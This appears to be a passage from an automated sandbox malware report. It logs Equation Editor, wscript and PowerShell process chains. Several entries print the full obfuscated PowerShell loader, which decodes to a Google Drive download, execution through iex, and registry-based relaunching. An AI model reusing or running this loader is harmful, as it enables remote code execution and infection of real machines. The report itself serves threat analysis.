Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Hypokonderens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00618F56 push eax; retf	2_2_00618F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0060F805 pushad ; ret	2_2_0060F80A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_006101F4 push eax; retf	2_2_006101F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00880D62 push eax; mov dword ptr [esp], ecx	7_2_00880F64
